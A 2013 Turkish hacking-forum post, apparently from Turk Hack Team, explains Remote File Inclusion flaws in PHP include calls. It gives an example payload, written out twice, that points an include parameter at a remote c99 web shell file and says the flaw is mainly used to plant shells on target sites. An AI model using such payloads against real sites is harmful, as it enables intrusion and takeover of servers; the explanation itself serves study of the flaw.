THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

RFI Mantığı

Black-Spy' - ait Kullanıcı Resmi (Avatar)
Özel Üye
Üyelik tarihi:
01/2013
Nereden:
İstanbul
Mesajlar:
6.041
Konular:
969
Teşekkür (Etti):
4227
Teşekkür (Aldı):
6364
Ticaret:
(0) %
09-06-2013 23:56
#1
RFI Mantığı
RFI Açığı Nedir ?

RFI Remote File Include’nin kısaltılmışıdır. Türkçe olarak Uzaktan Dosya Çağırma anlamına gelmektedir.
RFI Açığı sadece PHP sistemlerde bulunmaktadır. Çünkü RFI açığının mantığını oluşturan kodlar PHP’de bulunmaktadır.

RFI Mantığı ?
RFI açığını bir örnek üzerince incelersek mantığını daha iyi anlıyabilirsiniz.

Örneğin bir php script yazıyoruz.

index.php dosyamıza veritabanı dosyamızı çağıralım. Bunu gerçekleştirmek için gereken kodumuz;


index.php?include=veritabanı.php
bu kodu içeren bir dosya aşağıdaki gibi işlem görür.

Yani include komu ile veritabanı.php dosyamızı çağırdık. İşte RFI’da mantığımız bu işlem görme şeklini kullanmaktır. Nasıl mı ?

Eğer yukarıdaki kodlama yapılırken

$path_to_folder="./"
vb.. bir kod eklenmez ise yani çağrılmak istenen dosya sadece veritabanı.php ile sınırlandırlmaz ise biz istediğimiz dosyayı çağırabiliriz ve çağırdığımız tüm dosyalar php olarak işlem görür. Bir txt dosyası çağırırsak bile .php olarak işlem görür.

Örnek:

index.php?include=http://www.c99shell.gen.tr/c99.txt?
index.php?include=http://www.c99shell.gen.tr/c99.txt?

vs. şeklinde istediğimiz dosyayı çağırabiliriz.

Genel olarak bu açık hedef sitemize sh3LL yedirmek etmek için kullanılır.
---------------------
Sizin dediğiniz ”Vatan” dağda başlayıp çöplükte biter. Bizim bildiğimiz ”Vatan” yürekte başlayıp ”ŞEHADETLE” biter!

http://i.hizliresim.com/GkVJEb.gif

@blackspy_tht
blackspy@turkhackteam.info

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler